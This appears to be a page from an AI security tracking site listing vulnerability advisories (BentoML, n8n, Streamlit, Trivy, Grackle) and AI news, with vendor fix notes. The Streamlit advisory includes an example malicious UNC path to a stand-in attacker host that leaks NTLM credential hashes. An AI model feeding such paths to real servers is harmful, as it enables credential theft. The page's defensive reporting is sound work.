aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDatasetFor devs
Subscribe
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

Browse All

All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.

to
Export CSV
6344 items

Marriage over, €100,000 down the drain: the AI users whose lives were wrecked by delusion

infonews
safety
Mar 26, 2026

A man named Dennis Biesma became so deeply engaged with ChatGPT that he developed a false belief the AI was sentient (able to think and feel) and would make him rich, leading him to lose €100,000 in a failed business startup and attempt suicide. The article describes how prolonged interaction with an AI chatbot can cause some users to lose touch with reality and make harmful decisions based on delusions about the AI's capabilities. This raises concerns about the psychological impact of AI on vulnerable people, particularly those who are isolated or going through life changes.

The Guardian Technology

The snow gods: How a couple of ski bums built the internet’s best weather app

infonews
industry
Mar 26, 2026

OpenSnow is an independent weather app startup that uses government data, custom AI models (machine learning systems that learn patterns from data), and expert knowledge to provide better snow and avalanche forecasts than major weather services, becoming essential for skiers and snowboarders worldwide. Founded by two ski enthusiasts, Bryan Allegretto and Joel Gratz, the app grew from a 37-person email list to half a million followers by offering detailed daily snow reports and micro-accurate predictions, especially during unusual winter conditions.

GHSA-jfjg-vc52-wqvf: BentoML has Dockerfile Command Injection via system_packages in bentofile.yaml

highvulnerability
security
Mar 26, 2026
CVE-2026-33744

BentoML has a command injection vulnerability in the `docker.system_packages` field of bentofile.yaml (a configuration file). User-provided package names are inserted directly into Docker build commands without sanitization, allowing attackers to execute arbitrary shell commands as root during the image build process. This affects all versions supporting this feature, including version 1.4.36.

PATD: Privacy-Preserving Auditing and Transparent Deduplication in UAV Cloud Storage

inforesearchPeer-Reviewed
security

CVE-2026-33634: Aquasecurity Trivy Embedded Malicious Code Vulnerability

criticalvulnerability
security
Mar 25, 2026
CVE-2026-33634🔥 Actively Exploited

GHSA-43v7-fp2v-68f6: n8n's Source Control SSH Configuration Uses StrictHostKeyChecking=no

mediumvulnerability
security
Mar 25, 2026
CVE-2026-33724

n8n's Source Control feature, when configured to use SSH (a secure network protocol), disabled host key verification, meaning it didn't confirm the identity of the Git server it was connecting to. An attacker on the network could trick n8n into connecting to a fake server and inject malicious code into workflows or steal repository data.

GHSA-fxcw-h3qj-8m8p: n8n Has External Secrets Authorization Bypass in Credential Saving

highvulnerability
security
Mar 25, 2026
CVE-2026-33722

n8n, a workflow automation tool, had a security flaw where authenticated users without permission could bypass authorization checks and access plaintext values of external secrets (credentials stored in connected vaults) by guessing secret names. This vulnerability only affects instances with external vaults configured and requires the attacker to be a valid user who knows the target secret's name.

GHSA-vpgc-2f6g-7w7x: n8n Has Authorization Bypass in OAuth Callback via N8N_SKIP_AUTH_ON_OAUTH_CALLBACK

mediumvulnerability
security
Mar 25, 2026
CVE-2026-33720

n8n versions with `N8N_SKIP_AUTH_ON_OAUTH_CALLBACK` set to true have an authorization bypass vulnerability where attackers can trick users into connecting their OAuth tokens (credentials used for third-party authentication) to attacker-controlled accounts, allowing the attacker to run workflows with those stolen credentials. This only affects instances where this setting is explicitly enabled, which is not the default configuration.

GHSA-xw7x-h9fj-p2c7: OpenTelemetry: Unsafe Deserialization in RMI Instrumentation may Lead to Remote Code Execution

criticalvulnerability
security
Mar 25, 2026
CVE-2026-33701

OpenTelemetry Java instrumentation versions before 2.26.1 have a vulnerability in RMI instrumentation where incoming data is deserialized without proper validation, allowing attackers with network access to potentially execute arbitrary code on the affected system. The attack requires three conditions: OpenTelemetry must be running as a Java agent, an RMI endpoint (remote method invocation, a Java system for calling methods on remote servers) must be accessible over the network, and a gadget-chain-compatible library (a collection of existing code that can be chained together to execute unintended commands) must be present.

datasette-llm 0.1a1

infonews
industry
Mar 25, 2026

Datasette-llm 0.1a1 is a new plugin that lets other Datasette plugins use AI models by creating a central way to manage which models are used for which tasks. It introduces a register_llm_purposes() hook (a function that other plugins can use to register what they do) and allows plugins to request a specific model by its purpose, like asking for "the model designated for data enrichment" rather than hardcoding a model name.

GHSA-7p48-42j8-8846: Unauthenticated SSRF Vulnerability in Streamlit on Windows (NTLM Credential Exposure)

mediumvulnerability
security
Mar 25, 2026
CVE-2026-33682

Streamlit Open Source versions before 1.54.0 on Windows have an unauthenticated SSRF vulnerability (server-side request forgery, where an attacker tricks a server into making unintended network requests) in how it handles file paths. An attacker can supply a malicious UNC path (a Windows network address like \\attacker-host\share) that causes the Streamlit server to initiate SMB connections (the protocol Windows uses for file sharing) and leak NTLMv2 credential hashes (authentication proof) of the user running Streamlit, which could then be used in relay attacks or password cracking.

GHSA-c545-x2rh-82fc: n8n: LDAP Email-Based Account Linking Allows Privilege Escalation and Account Takeover

highvulnerability
security
Mar 25, 2026
CVE-2026-33665

n8n (a workflow automation platform) had a security flaw where LDAP authentication (a directory service for user identity management) would automatically link an LDAP user account to an existing local account if their email addresses matched. An attacker could change their LDAP email to match an administrator's email and gain full access to that account, with the unauthorized access persisting even after the email was changed back. This only affects n8n instances that have LDAP authentication specifically enabled.

GHSA-m63j-689w-3j35: n8n is Vulnerable to Credential Theft via Name-Based Resolution and Permission Checker Bypass in Community Edition

highvulnerability
security
Mar 25, 2026
CVE-2026-33663

n8n Community Edition has a security flaw where authenticated users with basic permissions can steal plaintext secrets from other users' HTTP credentials (like basic auth or header auth) by exploiting flaws in how credentials are looked up and validated. This happens because the system doesn't properly check who owns a credential and skips security checks for generic HTTP credential types, though this only affects Community Edition and not the paid Enterprise version.

GHSA-58qr-rcgv-642v: n8n has Multiple Remote Code Execution Vulnerabilities in Merge Node AlaSQL SQL Mode

criticalvulnerability
security
Mar 25, 2026
CVE-2026-33660

n8n, a workflow automation tool, has a security flaw in its Merge node's SQL mode that allows authenticated users to read files from the server and execute arbitrary code (remote code execution, where an attacker can run commands on a system they don't own). The vulnerability exists because the AlaSQL sandbox (a restricted environment meant to safely run SQL code) did not properly block certain dangerous SQL statements.

v0.14.19

infonews
security
Mar 25, 2026

This is a release update for LlamaIndex v0.14.19, a framework for building AI applications with large language models. The update includes multiple bug fixes across different components, such as correcting how document references are deleted from storage and fixing how database schemas are processed, along with dependency updates and new features like support for additional LLM providers.

Disney’s big bets on the metaverse and AI slop aren’t going so well

infonews
industry
Mar 25, 2026

Disney's new CEO is facing two major setbacks: OpenAI is shutting down its Sora image-generation program (software that creates images from text descriptions) just after Disney invested $1 billion to use it on Disney Plus, and Epic Games is laying off 1,000 employees while their $1.5 billion metaverse (a shared virtual world) project with Disney has gone quiet. These failures highlight risks in Disney's strategy to use AI and virtual worlds for future growth.

GHSA-8g29-8xwr-qmhr: @grackle-ai/server JSON.parse lacks try-catch logic in its gRPC Service AdapterConfig Handling

lowvulnerability
security
Mar 25, 2026

A vulnerability in the @grackle-ai/server package fails to handle errors when parsing JSON configuration data in three locations within its gRPC service (a remote procedure call system for inter-process communication). If the underlying SQLite database becomes corrupted or enters an unexpected state, the code could crash without gracefully reporting an error, and the unvalidated parsed data could theoretically be exploited if the database is compromised.

GHSA-5j35-xr4g-vwf4: @grackle-ai/server has a Missing Secure Flag on Session Cookie

lowvulnerability
security
Mar 25, 2026

The @grackle-ai/server software doesn't set the Secure flag on its session cookie (a flag that prevents the cookie from being sent over unencrypted connections). While this is safe for local use, enabling the `--allow-network` option exposes the cookie to interception over insecure connections, allowing attackers to steal session data.

GHSA-3mjm-x6gw-2x42: @grackle-ai/server has Missing Content-Security-Policy and X-Frame-Options Headers

mediumvulnerability
security
Mar 25, 2026

The Grackle AI server was missing three important HTTP security headers (Content-Security-Policy, X-Frame-Options, and X-Content-Type-Options) that protect against XSS attacks (where malicious code is injected into a webpage), clickjacking (tricking users into clicking hidden elements), and MIME-sniffing attacks (where browsers misinterpret file types). While current XSS risks are low, the missing headers remove a safety layer that would help prevent future vulnerabilities.

GHSA-xq7h-vwjp-5vrh: @grackle-ai/powerline Runs Without Authentication by Default

mediumvulnerability
security
Mar 25, 2026

The PowerLine gRPC server (a service that runs code through remote procedure calls, which is a way for programs to request actions from each other over a network) from @grackle-ai/powerline runs without any authentication by default when a token is not provided, allowing anyone who can reach the server to execute code and access credentials. Although the server only listens on localhost (127.0.0.1, the local machine) by default, it becomes critically dangerous if accidentally exposed on a network through containers or port forwarding.

Previous148 / 318Next
MIT Technology Review

Fix: The source text suggests two explicit fixes: (1) Input validation (recommended): Add a regex validator to `system_packages` in `build_config.py` that only allows alphanumeric characters, dots, plus signs, hyphens, underscores, and colons. (2) Output escaping: Apply `shlex.quote()` to each package name before interpolation in `images.py:system_packages()` and apply the `bash_quote` Jinja2 filter in `base_debian.j2`. The source notes that a `bash_quote` filter already exists in the codebase but is only currently applied to environment variables, not `system_packages`.

GitHub Advisory Database
Mar 26, 2026

This research paper addresses security and transparency challenges in cloud storage for UAV (unmanned aerial vehicle) data by proposing PATD, a system that combines privacy-preserving auditing with transparent deduplication. The paper identifies two main problems: verifying that outsourced data hasn't been corrupted or tampered with (without revealing the data itself), and ensuring that file deduplication (removing duplicate copies to save storage) is performed honestly and transparently by the cloud provider.

Elsevier Security Journals

Aquasecurity Trivy, a container scanning tool, has embedded malicious code that could let attackers steal sensitive information from CI/CD environments (the automated systems that build and deploy software), including security tokens, SSH keys (authentication credentials for servers), cloud login information, database passwords, and other secrets stored in memory. This is a supply-chain compromise (malicious code inserted into a software product before distribution) and is currently being exploited by real attackers.

Fix: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable. Additional vendor-provided guidance must be followed to ensure full remediation. See GitHub advisory GHSA-69fq-xp46-6x23 and NVD entry CVE-2026-33634 for more information.

CISA Known Exploited Vulnerabilities

Fix: The issue has been fixed in n8n version 2.5.0. Users should upgrade to this version or later to remediate the vulnerability. If upgrading is not immediately possible, administrators can temporarily disable the Source Control feature if not actively required, or restrict network access to ensure the n8n instance communicates with the Git server only over trusted, controlled network paths. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

GitHub Advisory Database

Fix: The issue has been fixed in n8n versions 1.123.23 and 2.6.4. Users should upgrade to one of these versions or later to remediate the vulnerability. If upgrading is not immediately possible, administrators can temporarily restrict n8n access to fully trusted users only or disable external secrets integration until the patch can be applied, though these workarounds do not fully remediate the risk.

GitHub Advisory Database

Fix: The issue has been fixed in n8n version 2.8.0. Users should upgrade to this version or later to remediate the vulnerability. If upgrading is not immediately possible, administrators should avoid enabling `N8N_SKIP_AUTH_ON_OAUTH_CALLBACK=true` unless strictly required and restrict access to the n8n instance to fully trusted users only (though these workarounds do not fully remediate the risk and should only be used as short-term measures).

GitHub Advisory Database

Fix: Upgrade to OpenTelemetry version 2.26.1 or later. Alternatively, disable RMI integration by setting the system property `-Dotel.instrumentation.rmi.enabled=false`.

GitHub Advisory Database
Simon Willison's Weblog

Fix: The vulnerability has been fixed in Streamlit Open Source version 1.54.0. It is recommended that all Streamlit deployments on Windows be upgraded immediately to version 1.54.0 or later.

GitHub Advisory Database

Fix: The issue has been fixed in n8n versions 2.4.0 and 1.121.0. Users should upgrade to one of these versions or later. If immediate upgrading is not possible, administrators can: disable LDAP authentication temporarily, restrict LDAP directory permissions so users cannot modify their own email attributes, or audit existing LDAP-linked accounts for unexpected associations. The source notes these workarounds do not fully remediate the risk and should only be short-term measures.

GitHub Advisory Database

Fix: Upgrade to n8n version 1.123.27, 2.13.3, or 2.14.1 or later. If upgrading is not immediately possible, administrators should restrict instance access to fully trusted users only and audit stored credentials to rotate any generic HTTP credentials (`httpBasicAuth`, `httpHeaderAuth`, `httpQueryAuth`) that may have been exposed, though these workarounds do not fully remediate the risk.

GitHub Advisory Database

Fix: The issue has been fixed in n8n versions 2.14.1, 2.13.3, and 1.123.27. Users should upgrade to one of these versions or later to remediate the vulnerability. If upgrading is not immediately possible, administrators can: (1) limit workflow creation and editing permissions to fully trusted users only, or (2) disable the Merge node by adding `n8n-nodes-base.merge` to the `NODES_EXCLUDE` environment variable. Note: these workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

GitHub Advisory Database
LlamaIndex Security Releases
The Verge (AI)

Fix: Wrap the JSON.parse() calls in try-catch blocks to handle errors gracefully. The source provides this exact fix: 'let config: Record<string, unknown>; try { config = JSON.parse(env.adapterConfig) as Record<string, unknown>; } catch { throw new ConnectError("Invalid adapter configuration", Code.Internal); }' Apply this pattern to all three affected locations in packages/server/src/grpc-service.ts (lines 415, 482, and 498).

GitHub Advisory Database

Fix: Update to version 0.70.5. The fix conditionally adds the `; Secure` attribute to the cookie when the server uses HTTPS or when `--allow-network` is enabled, using this code: `const securePart = isHttps ? "; Secure" : ""; return \`${SESSION_COOKIE_NAME}=${cookieValue}; HttpOnly; SameSite=Lax; Path=/${securePart}; Max-Age=${maxAge}\`;`. As a temporary workaround, do not use `--allow-network` over untrusted networks without a TLS-terminating reverse proxy (a security intermediary that handles encrypted connections).

GitHub Advisory Database

Fix: Update to version 0.70.4, which adds security headers to all responses. The fix adds these headers to the server code: Content-Security-Policy set to "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:", X-Frame-Options set to "DENY", and X-Content-Type-Options set to "nosniff". Alternatively, use a reverse proxy (nginx or Caddy) in front of the Grackle server to inject these security headers.

GitHub Advisory Database

Fix: Update to version 0.70.1, which changes the behavior to require an explicit `--no-auth` flag to intentionally run without authentication, rather than silently defaulting to no auth. The fix throws an error if the server starts without a token and without the `--no-auth` flag. As a workaround for earlier versions, always provide `--token` or set the `GRACKLE_POWERLINE_TOKEN` environment variable when starting PowerLine.

GitHub Advisory Database